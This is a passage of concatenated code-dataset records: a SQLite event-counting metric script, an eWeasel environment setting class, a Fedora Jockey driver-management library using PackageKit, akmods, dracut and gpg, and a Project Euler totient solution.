period ending at current time\nand in the preceding time period of equal length for a specific user.\nCompute metric for change from the previous time period to last time period.\n\"\"\"\n\nimport json\nimport time\nimport sqlite3\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom common import event_db\nfrom common import format\nfrom uuid import uuid4\n\n\n# count_events returns dictionary of number of events of each type\n# that occur between dt1 and dt2 for user_id.\ndef count_events(dt1, dt2, user_id, con):\n\n cur = con.cursor()\n\n event_count = { \"CreateEvent\": 0,\n \"DeleteEvent\": 0,\n \"ForkEvent\": 0,\n \"IssuesEvent\": 0,\n \"PullRequestEvent\": 0,\n \"PushEvent\": 0,\n \"WatchEvent\": 0 }\n\n dtstr1 = dt1.strftime(format)\n dtstr2 = dt2.strftime(format)\n\n print(dtstr1, dtstr2)\n\n timeA = datetime.now()\n\n if user_id == \"\":\n sql = \"\"\"\n select type\n from event\n where (created_at >= ?)\n and (created_at < ?)\n \"\"\"\n cur.execute(sql, (dtstr1, dtstr2))\n else:\n sql = \"\"\"\n select type\n from event\n where \"actor.login_h\" = ?\n and (created_at >= ?)\n and (created_at < ?)\n \"\"\"\n cur.execute(sql, (user_id, dtstr1, dtstr2))\n\n while True:\n row = cur.fetchone()\n if row == None:\n break\n\n (etype,) = row\n\n\n if etype in event_count:\n event_count[etype] += 1\n\n timeB = datetime.now()\n print('\\ntime in count_events query=', str(timeB-timeA))\n\n for etype in event_count.keys():\n print(etype, event_count[etype])\n\n return event_count\n\n\ndef past_behavior_metric(current_timestr, period_length, user_id, con):\n print ('running version 4 of past_behavior')\n dt_current_time = datetime.strptime(current_timestr, format)\n delta = timedelta(days=period_length)\n\n print(\"\\nFor user \", user_id)\n print(\"\\nevent count for last period:\")\n last_period = count_events(dt_current_time-delta, dt_current_time, user_id, con)\n\n\n print(\"\\nevent count for previous period:\")\n prev_period = count_events(dt_current_time-2*delta, dt_current_time-delta, user_id, con)\n\n print(\"\\ntype\", \" metric\")\n\n result = {}\n\n for etype in last_period.keys():\n if prev_period[etype] > 0:\n result[etype] = round(float(last_period[etype]) / prev_period[etype] - 1, 2)\n else:\n result[etype] = 0\n\n print(etype, result[etype])\n\n return 
result\n","sub_path":"MatrixCodeLevels/CodeLevel1/past_behavior_v4.py","file_name":"past_behavior_v4.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"186617733","text":"#!/usr/local/bin/python\nimport os\nfrom _class import *\n\nclass InitEnvParameter(InitEnvParameterClass):\n\tdef __init__(self):\n\t\tInitEnvParameterClass.__init__(self)\n\t\tself.id = \"eweasel\"\n\n\tdef title(self):\n\t\treturn \"eWeasel\"\n\n\tdef arg(self):\n\t\treturn \"--eweasel\"\n\n\tdef choices(self):\n\t\tarr = []\n\t\tarr.append ([\"on\", \"Enabled\"])\n\t\tarr.append ([\"off\", \"Disabled\"])\n\t\tarr.append ([\"_default\", \"off\"])\n\t\treturn arr\n\n\tdef output_init(self,home_bin,choice,writer):\n\t\twriter.put_comment (\"## Init:%s ##\" % (self.title()))\n\n\tdef output(self,home_bin,choice,writer):\n\t\tif choice == '_skip':\n\t\t\twriter.put_message (\"Skipping: %s settings\" % (self.title()))\n\t\telse:\n\t\t\tch = choice\n\t\t\tif choice == \"on\":\n\t\t\t\twriter.put_set_variable ('EWEASEL', '%EIFFEL_SRC%\\\\..\\\\eweasel')\n\t\t\t\twriter.put_set_variable ('EWEASEL_OUTPUT', '%EIFFEL_SRC%\\\\..\\\\..\\\\eweasel\\\\output')\n\t\t\t\twriter.put_set_variable ('ISE_LIBRARY', '%ISE_EIFFEL%')\n\n\t\t\t\t\t# Add eweasel to PATH\n\t\t\t\twriter.put_append_to_path ('%EWEASEL%\\\\spec\\\\%ISE_PLATFORM%\\\\bin')\n\t\t\telse:\n\t\t\t\twriter.put_unset_variable ('EWEASEL')\n\t\t\t\twriter.put_unset_variable ('EWEASEL_OUTPUT')\n\n\t\t\t\ttry:\n\t\t\t\t\teiffel_src_set = os.environ['eiffel_src_set']\n\t\t\t\texcept KeyError:\n\t\t\t\t\teiffel_src_set = ''\n\t\t\t\tif len(eiffel_src_set) > 0:\n\t\t\t\t\twriter.put_set_variable ('EWEASEL', '%EIFFEL_SRC%\\\\..\\\\eweasel')\n\t\t\twriter.put_echo_mode(False)\n\t\t\t\n","sub_path":"initenv/settings/parameters/eweasel.py","file_name":"eweasel.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"495868545","text":"# -*- coding: UTF-8 -*-\n# (c) 2007 Canonical Ltd.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n'''Encapsulate operations which are Linux distribution specific.'''\n\nimport fcntl, os, subprocess, sys, logging, re, tempfile, time, shutil\nfrom glob import glob\n\n# global variables\nakmods_enabled = False\n\nclass OSLib:\n    '''Encapsulation of operating system/Linux distribution specific operations.'''\n\n    # global default instance\n    inst = None\n\n    global akmods_enabled\n    #logging.debug('class akmod status: %s', akmods_enabled)\n    print(\"class akmod status: %s\" % akmods_enabled)\n\n    def __init__(self, client_only=False, target_kernel=None):\n        '''Set default paths and load the module blacklist.\n\n        Distributors might want to override some default paths.\n        If client_only is True, this only initializes functionality which is\n        needed by clients, and which can be done without special privileges.\n\n        If target_kernel is given, it is used instead of the default\n        os.uname()[2]. This is primarily useful for distribution installers\n        where the target system kernel differs from the installer kernel.\n        '''\n\n        global akmods_enabled\n        logging.debug('init akmod status pre-config: %s', akmods_enabled)\n\n        self.remove_pkg_queue = set()\n\n        # relevant stuff for clients and backend\n        self._get_os_version()\n\n        # location of config file\n        self.config_file = '/etc/jockey.conf'\n\n        # /sys/ path; the main purpose of changing this is for test\n        # suites, but some vendors might have /sys in a nonstandard place\n        self.sys_dir = '/sys'\n\n        if client_only:\n            return\n\n        # below follows stuff which is only necessary for the backend\n\n        # default paths\n\n        # path to a modprobe.d configuration file where kernel modules are\n        # enabled and disabled with blacklisting\n        self.module_blacklist_file = '/etc/modprobe.d/blacklist-local.conf'\n\n        # path to modinfo binary\n        self.modinfo_path = '/sbin/modinfo'\n\n        # path to modprobe binary\n        self.modprobe_path = '/sbin/modprobe'\n\n        # path to kernel's list of loaded modules\n        self.proc_modules = '/proc/modules'\n\n        # default path to custom handlers\n        self.handler_dir = '/usr/share/jockey/handlers'\n\n        if target_kernel:\n            self.target_kernel = target_kernel\n        else:\n            self.target_kernel = os.uname()[2]\n\n        # default paths to modalias files (directory entries will consider all\n        # files in them)\n\n        # set akmod support to disabled by default, enabled below after reading config file\n        #self.akmods_enabled = False\n\n        # Enable akmods if set in config, else check PAE, fall back to kmod.\n        # Choose the default first so alias_dir is defined even for an empty\n        # config file, and stop at the first akmods=true line so that a later\n        # line cannot overwrite the setting again.\n        if re.search('PAE', self.target_kernel):\n            alias_dir = '-PAE'\n        else:\n            alias_dir = ''\n\n        conf_file = open(self.config_file)\n        for line in conf_file:\n            if \"akmods=true\" in line.lower():\n                alias_dir = '-akmods'\n                akmods_enabled = True\n                break\n        conf_file.close()\n\n        logging.debug('init akmod status post-config: %s', akmods_enabled)\n\n        self.modaliases = [\n            '/usr/share/jockey/modaliases%s/' % alias_dir,\n        ]\n\n        # path to X.org configuration file\n        self.xorg_conf_path = '/etc/X11/xorg.conf'\n\n        self.set_backup_dir()\n\n        # cache file for previously seen/newly used handlers lists (for --check)\n        self.check_cache = os.path.join(self.backup_dir, 'check')\n\n        self._load_module_blacklist()\n\n        # Possible paths of a file with a set of SSL certificates which are\n        # considered trustworthy. 
The first one that exists will be used.\n # This is used for downloading GPG key fingerprints for\n # openprinting.org driver packages.\n self.ssl_cert_file_paths = [\n # Debian/Ubuntu use the ca-certificates package:\n '/etc/ssl/certs/ca-certificates.crt'\n ]\n\n # default GPG key server\n # this is the generally recommended DNS round-robin, but usually very\n # slow:\n #self.gpg_key_server = 'keys.gnupg.net'\n self.gpg_key_server = 'hkp://keyserver.ubuntu.com:80'\n\n # Package which provides include files for the currently running\n # kernel. If the system ensures that kernel headers are always\n # available, or being pulled in via dependencies (and there are not\n # multiple kernel flavors), it is ok to set this to \"None\". This should\n # use self.target_kernel instead of os.uname()[2].\n self.kernel_header_package = None\n\n #\n # The following functions are Fedora specific\n #\n\n def build_kmod(self, progress_cb, phase):\n '''Build kmod package.'''\n\n phase = phase\n err = ''\n\n progress_cb(phase, -1, -1)\n\n logging.debug('\\n\\n\\nbuild_kmod\\n\\n\\n')\n time.sleep(30)\n\n kernel_version = os.uname()[2]\n akmods = subprocess.Popen(['/usr/sbin/akmods', '--kernels', kernel_version],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n err += akmods.stderr.read()\n\n if akmods.wait() != 0:\n logging.error('Failed to build kmod: %s' % (err))\n else:\n logging.debug('Successfully built kmod for kernel %s' % kernel_version)\n\n\n def rebuild_initramfs(self, progress_cb, phase):\n '''Rebuild the initramfs.'''\n\n phase = phase\n err = ''\n\n if progress_cb and phase == \"remove\":\n progress_cb(-1, -1)\n else:\n progress_cb(phase, -1, -1)\n\n logging.debug('\\n\\n\\nbuild_initramfs\\n\\n\\n')\n time.sleep(30)\n\n dracut = subprocess.Popen(['/sbin/dracut', '--force', '-v'],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n err += dracut.stderr.read()\n\n if dracut.wait() != 0:\n logging.error('Failed to rebuild initramfs: %s' % (err))\n else:\n logging.debug('Successfully rebuilt initramfs')\n\n #\n # The following package related functions use PackageKit; if that does not\n # work for your distribution, they must be reimplemented\n #\n\n def is_package_free(self, package):\n '''Return if given package is free software.'''\n\n pkcon = subprocess.Popen(['pkcon', '--filter=newest',\n 'get-details', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n m = re.search(\"^\\s*license:\\s*'?(.*)'?$\", out, re.M)\n if m:\n # TODO: check more licenses here\n return m.group(1).lower().startswith('gpl') or \\\n m.group(1).lower() in ('free', 'bsd', 'mpl')\n else:\n raise ValueError('package %s does not exist' % package)\n\n def package_installed(self, package):\n '''Return if the given package is installed.'''\n\n pkcon = subprocess.Popen(['pkcon', 'resolve', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = pkcon.communicate()[0]\n return pkcon.returncode == 0 and '\\ninstalled ' in out.lower()\n\n def package_description(self, package):\n '''Return a tuple (short_description, long_description) for a package.\n\n This should raise a ValueError if the package is not available.\n '''\n pkcon = subprocess.Popen(['pkcon', '--filter=newest',\n 'get-details', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # 
we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n m = re.search(\"^\\s*description:\\s*'?(.*?)'?^\\s+\", out, re.M | re.S)\n if m:\n # TODO: short description (not accessible with pkcon)\n return (package, m.group(1).replace('\\n', ''))\n else:\n raise ValueError('package %s does not exist' % package)\n\n def package_files(self, package):\n '''Return a list of files shipped by a package.\n\n This should raise a ValueError if the package is not installed.\n '''\n pkcon = subprocess.Popen(['pkcon', '--filter=installed',\n 'get-files', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n if pkcon.returncode == 0 and '\\n ' in out:\n return [l.strip() for l in out.splitlines() if l.startswith(' ')]\n else:\n raise ValueError('package %s is not installed' % package)\n\n def install_package(self, package, progress_cb, repository=None,\n fingerprint=None):\n '''Install the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(phase, current, total) is called\n regularly, with 'phase' being 'download' or 'install'. If the callback\n returns True, the installation is attempted to get cancelled (this\n will probably succeed in the 'download' phase, but not in 'install').\n Passes '-1' for current and/or total if time cannot be determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return True.\n\n If a repository URL is given, that repository is added to the system\n first. The format for repository is distribution specific. This function\n should also download/update the package index for this repository when\n adding it.\n .\n fingerprint, if not None, is a GPG-style fingerprint of that\n repository; if present, this method should also retrieve that GPG key\n from the keyservers, install it into the packaging system, and ensure\n that the repository is signed with that key.\n\n An unknown package should raise a ValueError. 
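\n\n        A purely illustrative sketch (hypothetical caller-side code, not part\n        of this API contract):\n\n            def progress_cb(phase, current, total):\n                # phase is 'download' or 'install'; -1 means indeterminate\n                print('%s: %s/%s' % (phase, current, total))\n                return False  # returning True would request cancellation\n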
Any installation failure\n due to bad packages should be logged, but not raise an exception, as\n this would just crash the backend.\n '''\n\n global akmods_enabled\n logging.debug('install_package akmod status: %s', akmods_enabled)\n print(\"install_package akmod status: %s\" % akmods_enabled)\n\n if repository or fingerprint:\n raise NotImplementedError('PackageKit default implementation does not currently support repositories or fingerprints')\n\n # this will check if the package exists\n self.package_description(package)\n\n pkcon = subprocess.Popen(['pkcon', 'install', '--plain', '-y', package],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # we send an \"1\" to select package if several versions\n # are available\n print >>pkcon.stdin, \"1\\n\"\n\n re_progress = re.compile('Percentage:\\t(\\d+)')\n\n phase = None\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n if 'Downloading packages' in line:\n phase = 'download'\n elif 'Testing changes' in line or 'Installing packages' in line:\n phase = 'install'\n elif progress_cb and 'Percentage' in line:\n m = re_progress.search(line)\n if m and phase:\n progress_cb(phase, int(m.group(1)), 100)\n else:\n progress_cb(phase or 'download', -1, -1)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n if pkcon.wait() != 0 or not self.package_installed(package):\n logging.error('package %s failed to install: %s' % (package, err))\n\n\n if akmods_enabled:\n self.build_kmod(progress_cb, phase)\n\n self.rebuild_initramfs(progress_cb, phase)\n\n def queue_packages_for_removal(self, packages):\n self.remove_pkg_queue.update(packages)\n\n def remove_package(self, package, progress_cb):\n '''Uninstall the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. 
Passes '-1' for current and/or total if time cannot be\n determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return False.\n\n Any removal failure should be raised as a SystemError.\n '''\n progress_cb(0, 100)\n pkcon = subprocess.Popen(['pkcon', '--plain', '--filter=installed',\n 'search', 'name', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n re_packages = re.compile(\"Installed\\s+([\\w:.-]+)-([\\w:.]+)-([\\w:.]+)\")\n\n driver_packages = { package }\n driver_packages.update(self.remove_pkg_queue)\n self.remove_pkg_queue.clear()\n\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n if 'Installed' in line:\n m = re_packages.search(line)\n if m:\n driver_packages.add(m.group(1))\n else:\n logging.error('Cannot extract the package name from %s' % line)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n pkcon.wait()\n\n progress_start = 100\n progress_total = 100 + 100 * len(driver_packages)\n\n logging.debug('Removing packages: %s' % driver_packages)\n for pkg in driver_packages:\n progress_cb(progress_start, progress_total)\n self.remove_single_package(pkg, progress_cb, progress_start,\n progress_total)\n progress_start += 100\n\n if self.package_installed(package):\n raise SystemError('package %s failed to remove: %s' % (package, err))\n\n self.rebuild_initramfs(progress_cb, \"remove\")\n\n def remove_single_package(self, package, progress_cb, progress_start,\n progress_total):\n '''Uninstall the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. 
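\n\n        Worked example (illustrative numbers): remove_package() sets\n        progress_total = 100 + 100 * len(driver_packages), so with two\n        packages progress_total is 300 and the second package reports\n        progress_cb(200 + pct, 300) for pct in 0..100.\n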
Passes progress_start for current and/or progress_total\n for total if time cannot be determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return False.\n\n Any removal failure should be raised as a SystemError.\n '''\n pkcon = subprocess.Popen(['pkcon', 'remove', '--plain', '-y', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n re_progress = re.compile('Percentage:\\t(\\d+)')\n\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n elif progress_cb and 'Percentage' in line:\n m = re_progress.search(line)\n if m:\n progress_cb(progress_start + int(m.group(1)), progress_total)\n else:\n progress_cb(progress_start, progress_total)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n pkcon.wait()\n if self.package_installed(package):\n raise SystemError('package %s failed to remove: %s' % (package, err))\n\n def has_repositories(self):\n '''Check if package repositories are available.\n\n This might not be the case after a fresh installation, when package\n indexes haven't been downloaded yet.\n '''\n pkcon = subprocess.Popen(['pkcon', 'get-details', 'bash'],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = pkcon.communicate()[0]\n # PK can't detect package sizes without repositories\n m = re.search(\"^\\s*size:\\s*0 bytes$\", out, re.M)\n return m == None\n\n def update_repository_indexes(self, progress_cb):\n '''Download package repository indexes.\n\n Return True on success, False otherwise.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. 
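\n\n        Hypothetical caller sketch (the no-op pulse callback is an assumption,\n        not a requirement):\n\n            ok = OSLib.inst.update_repository_indexes(lambda cur, tot: None)\n            if not ok:\n                logging.warning('package indexes still unavailable')\n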
Passes '-1' for current and/or total if time cannot be\n determined.\n '''\n pkcon = subprocess.Popen(['pkcon', 'refresh'],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n while pkcon.poll() == None:\n time.sleep(0.3)\n if progress_cb:\n progress_cb(-1, -1)\n pkcon.wait()\n return self.has_repositories()\n\n def packaging_system(self):\n '''Return packaging system.\n\n Currently defined values: apt, yum\n '''\n if os.path.exists('/etc/apt/sources.list') or os.path.exists(\n '/etc/apt/sources.list.d'):\n return 'apt'\n elif os.path.exists('/etc/yum.conf'):\n return 'yum'\n\n raise NotImplementedError('local packaging system is unknown')\n\n def import_gpg_key(self, keyring, fingerprint):\n '''Download and install a GPG key identified by fingerprint.\n\n This verifies that the fingerprint matches, and if so, installs it into\n the given keyring file (will be created if it does not exist).\n\n Raise a SystemError if anything goes wrong.\n '''\n if fingerprint in self._gpg_keyring_fingerprints(keyring):\n return\n\n # gpg likes to write trustdb and temporary files, so create a temporary\n # home directory\n keyid = fingerprint.replace(' ', '')[-8:]\n gpghome = tempfile.mkdtemp()\n default_keyring = os.path.join(gpghome, 'pubring.gpg')\n try:\n # we first import into a temporary keyring, as we need to verify\n # the fingerprint\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', default_keyring,\n '--keyserver', self.gpg_key_server, '--recv-key', keyid],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env={'PATH': os.environ.get('PATH', ''),\n 'http_proxy': os.environ.get('http_proxy', '')})\n (out, err) = gpg.communicate()\n\n if fingerprint not in self._gpg_keyring_fingerprints(default_keyring):\n raise SystemError('gpg failed to import key: ' + err)\n\n # now move over to the actual keyring; for multiple matches of the\n # same key ID it would be great to be able to select the one that\n # we want, but unfortunately the GPG command line doesn't really\n # allow that; fortunately key ID conflicts are very rare.\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', keyring,\n '--import', default_keyring],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env={'PATH': os.environ.get('PATH', '')})\n (out, err) = gpg.communicate()\n\n if fingerprint not in self._gpg_keyring_fingerprints(default_keyring):\n raise SystemError('gpg failed to import key: ' + err)\n\n logging.debug('import_gpg_key(): Successfully imported key' + keyid)\n except OSError as e:\n raise SystemError('failed to call gpg: ' + str(e))\n finally:\n shutil.rmtree(gpghome)\n\n def _gpg_keyring_fingerprints(self, keyring):\n '''Return list of fingerprints in given keyring'''\n\n # gpg likes to write trustdb and temporary files, so create a temporary\n # home directory\n gpghome = tempfile.mkdtemp()\n try:\n result = []\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', keyring,\n '--fingerprint'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, env={})\n (out, err) = gpg.communicate()\n if gpg.returncode != 0:\n logging.error('failed to call gpg for reading fingerprints: ' + err)\n return []\n\n for l in out.splitlines():\n if 'fingerprint =' in l:\n result.append(l.split('=')[1].strip())\n return result\n except OSError as e:\n logging.error('failed to call gpg: ' + str(e))\n return []\n finally:\n shutil.rmtree(gpghome)\n\n #\n # The following functions MUST be 
implemented by distributors\n # Note that apt and yum PackageKit backends currently do not implement\n # RepoSetData(), so those need to remain package system specific\n #\n\n def repository_enabled(self, repository):\n '''Check if given repository is enabled.'''\n\n raise NotImplementedError('subclasses need to implement this')\n\n def ui_help_available(self, ui):\n '''Return if help is available.\n\n This gets the current UI object passed, which can be used to determine\n whether GTK/KDE is used, etc.\n '''\n return False\n\n def ui_help(self, ui):\n '''The UI's help button was clicked.\n\n This should open a help HTML page or website, call yelp with an\n appropriate topic, etc. This gets the current UI object passed, which\n can be used to determine whether GTK/KDE is used, etc.\n '''\n pass\n\n #\n # The following functions have a reasonable default implementation for\n # Linux, but can be tweaked by distributors\n #\n\n def set_backup_dir(self):\n '''Setup self.backup_dir, directory where backup files are stored.\n\n This is used for old xorg.conf, DriverDB caches, etc.\n '''\n self.backup_dir = '/var/cache/jockey'\n if not os.path.isdir(self.backup_dir):\n try:\n os.makedirs(self.backup_dir)\n except OSError as e:\n logging.error('Could not create %s: %s, using temporary '\n 'directory; all your caches will be lost!',\n self.backup_dir, str(e))\n self.backup_dir = tempfile.mkdtemp(prefix='jockey_cache')\n\n def ignored_modules(self):\n '''Return a set of kernel modules which should be ignored.\n\n This particularly effects free kernel modules which are shipped by the\n OS vendor by default, and thus should not be controlled with this\n program. Since this will include the large majority of existing kernel\n modules, implementing this is also important for speed reasons; without\n it, detecting existing modules will take quite long.\n\n Note that modules which are ignored here, but covered by a custom\n handler will still be considered.\n '''\n return set()\n\n def module_blacklisted(self, module):\n '''Check if a module is on the modprobe blacklist.'''\n\n return module in self._module_blacklist or \\\n module in self._module_blacklist_system\n\n def blacklist_module(self, module, blacklist):\n '''Add or remove a kernel module from the modprobe blacklist.\n\n If blacklist is True, the module is blacklisted, otherwise it is\n removed from the blacklist.\n '''\n if blacklist:\n self._module_blacklist.add(module)\n else:\n try:\n self._module_blacklist.remove(module)\n except KeyError:\n return # no need to save the blacklist\n\n self._save_module_blacklist()\n\n def _load_module_blacklist(self):\n '''Initialize self._module_blacklist{,_system}.'''\n\n self._module_blacklist = set()\n self._module_blacklist_system = set()\n\n self._read_blacklist_file(self.module_blacklist_file, self._module_blacklist)\n\n # read other blacklist files (which we will not touch, but evaluate)\n for f in glob('%s/blacklist*' % os.path.dirname(self.module_blacklist_file)):\n if f != self.module_blacklist_file:\n self._read_blacklist_file(f, self._module_blacklist_system)\n\n @classmethod\n def _read_blacklist_file(klass, path, blacklist_set):\n '''Read a blacklist file and add modules to blacklist_set.'''\n\n try:\n f = open(path)\n except IOError:\n return\n\n try:\n fcntl.flock(f.fileno(), fcntl.LOCK_SH)\n for line in f:\n # strip off comments\n line = line[:line.find('#')].strip()\n\n if not line.startswith('blacklist'):\n continue\n\n module = line[len('blacklist'):].strip()\n if module:\n 
blacklist_set.add(module)\n        finally:\n            f.close()\n\n    def _save_module_blacklist(self):\n        '''Save module blacklist.'''\n\n        if len(self._module_blacklist) == 0 and \\\n            os.path.exists(self.module_blacklist_file):\n            os.unlink(self.module_blacklist_file)\n            return\n\n        os.umask(0o22)\n        # create directory if it does not exist\n        d = os.path.dirname(self.module_blacklist_file)\n        if not os.path.exists(d):\n            os.makedirs(d)\n\n        f = None\n        try:\n            f = open(self.module_blacklist_file, 'w')\n            fcntl.flock(f.fileno(), fcntl.LOCK_EX)\n            for module in sorted(self._module_blacklist):\n                # write() instead of the Python 2 only \"print >> f\" statement\n                f.write('blacklist %s\\n' % module)\n        except IOError as e:\n            logging.error('Failed to write to module blacklist: ' + str(e))\n        finally:\n            if f:\n                f.close()\n\n    def _get_os_version(self):\n        '''Initialize self.os_vendor and self.os_version.\n        '''\n        re_distinfo = re.compile('(\\w+) release ([\\d.]+) \\((\\w+)\\)')\n        release_file = open('/etc/system-release')\n        dinfo_line = release_file.readline()\n        release_file.close()\n        distinfo = re_distinfo.search(dinfo_line)\n        if distinfo:\n            self.os_vendor = distinfo.group(1)\n            self.os_version = distinfo.group(2)\n        else:\n            p = subprocess.Popen(['lsb_release', '-si'], stdout=subprocess.PIPE,\n                stderr=subprocess.PIPE, close_fds=True)\n            self.os_vendor = p.communicate()[0].strip()\n            p = subprocess.Popen(['lsb_release', '-sr'], stdout=subprocess.PIPE,\n                stderr=subprocess.PIPE, close_fds=True)\n            self.os_version = p.communicate()[0].strip()\n            assert p.returncode == 0\n\n    def get_system_vendor_product(self):\n        '''Return (vendor, product) of the system hardware.\n\n        Either or both can be '' if they cannot be determined.\n\n        The default implementation queries sysfs.\n        '''\n        try:\n            vendor = open(os.path.join(self.sys_dir,\n                'class', 'dmi', 'id', 'sys_vendor')).read().strip()\n        except IOError:\n            vendor = ''\n\n        try:\n            product = open(os.path.join(self.sys_dir,\n                'class', 'dmi', 'id', 'product_name')).read().strip()\n        except IOError:\n            product = ''\n\n        return (vendor, product)\n\n    def notify_reboot_required(self):\n        '''Notify the system that a reboot is required.\n\n        This can be used as an extra indication when installing a driver which\n        needs a reboot to get active.\n\n        The default implementation does nothing.\n        '''\n        pass\n\n    def package_header_modaliases(self):\n        '''Get modalias map from package headers.\n\n        Driver packages may declare the modaliases that they support in a\n        package header field, so that they do not need to have a separate\n        modalias file list already installed. 
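\n\n        As a purely hypothetical illustration of such a map (the package name,\n        module name and modalias pattern are all made-up values):\n\n            {'example-driver': {'examplemod': ['pci:v0000ABCDd*sv*sd*bc03sc*i*']}}\n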
The map must have the following\n structure: package_name -> module_name -> [list of modaliases]\n\n If this is not supported, simply return an empty dictionary here.\n '''\n return {}\n\n def ssl_cert_file(self):\n '''Get file with trusted SSL certificates.\n\n This is used for downloading GPG key fingerprints for\n openprinting.org driver packages.\n\n Return None if no certificates file is available.\n '''\n for f in self.ssl_cert_file_paths:\n if os.path.exists(f):\n return f\n\n return None\n\n @classmethod\n def has_defaultroute(klass):\n '''Return if there is a default route.\n\n This is a reasonable indicator that online tests can be run.\n '''\n if klass._has_defaultroute_cache is None:\n klass._has_defaultroute_cache = False\n route = subprocess.Popen(['/sbin/route', '-n'],\n stdout=subprocess.PIPE)\n for l in route.stdout:\n if l.startswith('0.0.0.0 '):\n klass._has_defaultroute_cache = True\n route.wait()\n\n return klass._has_defaultroute_cache\n\n _has_defaultroute_cache = None\n\n def current_xorg_video_abi(self):\n '''Return current X.org video ABI.\n\n For an X.org video driver to actually work it must be built against the\n currently used X.org driver ABI, otherwise it will cause crashes. This\n method returns the currently expected video driver ABI from the X\n server. If it is not None, it must match video_driver_abi() of a driver\n package for this driver to be offered for installation.\n\n If this returns None, ABI checking is disabled.\n '''\n return None\n\n def video_driver_abi(self, package):\n '''Return video ABI for an X.org driver package.\n\n For an X.org video driver to actually work it must be built against the\n currently used X.org driver ABI, otherwise it will cause crashes. This\n method returns the video ABI for a driver package. 
If it is not None,\n it must match current_xorg_video_abi() for this driver to be offered\n for installation.\n\n If this returns None, ABI checking is disabled.\n '''\n return None\n","sub_path":"jockey/oslib.py","file_name":"oslib.py","file_ext":"py","file_size_in_byte":31628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345222560","text":"import math\n\nlim = 10000000\n\nphi = [None] * lim\nsol, mx = None, math.inf\nphi[1] = 1\nfor i in range(2, lim):\n\tif phi[i] is None:\n\t\tphi[i] = i - 1\n\n\t\tfor j in range(2, lim):\n\t\t\tif i * j >= lim:\n\t\t\t\tbreak\n\t\t\telif phi[j] is not None:\n\t\t\t\tq, f = j, i - 1\n\t\t\t\twhile not q % i:\n\t\t\t\t\tq, f = q // i, f * i # integer division keeps q an exact int\n\t\t\t\tphi[i * j] = f * phi[q]\n\t\t\t\n\t\t\t\nfor i in range(2, lim):\n\tif sorted(str(i)) == sorted(str(phi[i])):\n\t\ttx = float(i) / float(phi[i])\n\t\tif tx < mx:\n\t\t\tsol, mx = i, tx\n\nprint(sol)\n\n\n\n","sub_path":"Solution-070.py","file_name":"Solution-070.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"58702195","text":"\"\"\"\n    SQLAlchemy-ElasticQuery\n    